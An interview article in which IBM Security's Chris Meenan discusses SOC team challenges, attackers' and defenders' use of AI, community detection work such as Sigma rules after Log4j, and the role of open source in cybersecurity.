Interview: Chris Meenan On The Role Of AI And Open Source Technologies In The Future Of Cybersecurity
Chris Meenan explains the biggest challenges currently facing SOC teams and the future of open source technology.
The cybersecurity industry is experiencing a volatile period, with rapid advancements in technology alongside global conflicts and widespread economic downturn putting a strain on IT and SOC teams. On top of that, IT infrastructure is becoming increasingly complex as businesses migrate to the cloud to leverage the agility, scalability, and financial benefits of a cloud infrastructure.
“Organizations are moving to the cloud and our attack surface is expanding,” says Chris Meenan, VP of Security Product Management at IBM Security. “There are new tools, new technologies, new acronyms, and new languages. It’s exacerbating a lot of existing challenges.”
Chris is responsible for IBM Security’s threat management portfolio, which includes QRadar SIEM, Log Manager Risk Manager, and Vulnerability Manager—all of which are used by IBM Security’s customers to detect and respond to threats. Chris has over 20 years of experience in the software industry, specializing in product development, launch, and marketing.
In an exclusive interview with Expert Insights at RSAC 2023, Chris discusses the biggest challenges currently facing SOC teams, how we can expect the rise of AI to impact the threat landscape in the coming years, how smaller organizations can keep up with those changes, and the role of open source technologies in the future of cybersecurity.
You can listen to our full conversation with Chris on the Expert Insights Podcast.
AI And ML: Improving Efficiency For Defense Teams And Black Hats Alike
The rise of AI has been a particularly big topic this year, with advances in ML-driven technologies such as Chat GPT taking the media by storm. One of the biggest questions in the security world is how adversaries will utilize these tools—after all, we must assume that both sides of the cyber war have access to them.
Many security experts suggest that, rather than using AI and ML to develop new attack methods, it’s likely that threat actors will use them to make their current methods more effective.
“Attackers are using more AI and automation to accelerate their ability to launch campaigns against their targets,” says Chris. “The average time for launching a ransomware attack has gone down from days to just minutes, using automation.”
But it isn’t only the Black Hats that are working out how to utilize new AI technologies—security providers are also looking for ways leverage the technology within their defensive portfolios. If they can do this effectively, some of the pressure on SOC teams can be reduced throughout their cloud migration.
“AI has been on a bit of a journey in security,” says Chris. “IBM has 13 SOCs globally that we use to secure our customers, and we’ve been building and maturing our AI in there the last few years. It’s helping get to the high priority alerts and incidents really quickly and taking away some of the noise.”
“But—with this move to cloud, all the new technologies, the new languages, and the new types of attack—I think AI has got a really big role to play in terms of bringing all of that back into a simpler language for the security team to interpret what’s happening and what they should do.”
By utilizing AI, security teams will be able to automate many of the repetitive, administrative tasks that they have to carry out, leaving them with more time to work on threat detection and remediation, thereby improving their infrastructure.
“We will see [AI] being used as a real force multiplier within security,” explains Chris.
The Importance Of Community
In the face of these changes, it can be difficult for business to know where to start when it comes to security—particularly among organizations that may not have extensive technical or financial resource in-house to dedicate to security. There are two important sources of help that these organizations can rely on: managed service providers (MSPs), and the wider security community.
“Trusted partners are always a great thing to lean on,” says Chris. “At IBM, we focus a lot on technology, but we also focus on ensuring that our customers have an ecosystem of partners. We provide services to help, but we also have a partner ecosystem.”
“There’s another element that has been growing quite significantly in the last couple of years—the InfoSec community itself, and the development of open source and open standards for security. You’re starting to see a lot of communities around standards such as Sigma, for threat intelligence and information exchange.”
The power of community in the security industry was exemplified in response to the 2022 Log4j vulnerability.
“Within 30 minutes of that vulnerability being published, there was a protection created by the community and published on the Sigma GitHub. Yet a week later, there were still some vendors—not IBM—that had not published their guidance or ability to detect and remediate that vulnerability.”
“So, I think the InfoSec community is going to become a really big factor in being able to collaborate a lot easier.”
The Future Is Open Source
The security community is increasingly embracing the use of open source technologies and standards. Open source technology is distributed with its source code; this means it’s freely available for anyone to use, modify, and redistribute. Open source projects encourage transparent exchange and collaboration. There is a sense of community when it comes to developing and using open source code. Because of this, some experts consider open source code to be more secure than proprietary code.
“When you look at open source code, there are thousands of developers looking at it every day. So, if there are vulnerabilities in it, someone’s going to see them really quickly,” explains Chris.
Because of this, we can expect more vendors to start embracing open source within their own solutions. However, one of the challenges with this lies in the question of responsibility for the security of the code: is it down to the creator to fix issues, or the distributors, or the people using it in their own technology?
“A lot of organizations don’t take the open source code and compile it themselves; they’ll take it pre-compiled,” says Chris. “I think that we will continue to see trusted vendors that take open source code, compile it themselves, and then support and share it. In which case, I think, as part of the value of that, they should be providing some of the certification.”
Despite these questions, we should expect the industry to continue to embrace open source as a means of accelerating the detection of vulnerabilities and backdoors, says Chris. But it doesn’t just offer benefits to security providers, open source security can also be hugely beneficial to businesses trying to improve their own security.
“If you have an open source and open standards approach, where security products publish standards-based API’s and have standards-based ontologies, that’s going to see if security teams have incredible amount of time and give them an incredible amount of choice, because they’re not going to get locked into vendor-specific integrations,” explains Chris.
Listen On Spotify:
Listen On Apple Podcasts
About Expert Insights
Expert Insights provides leading research, reviews, and interviews to help organizations make the right IT purchasing decisions. You can find all of our podcasts here.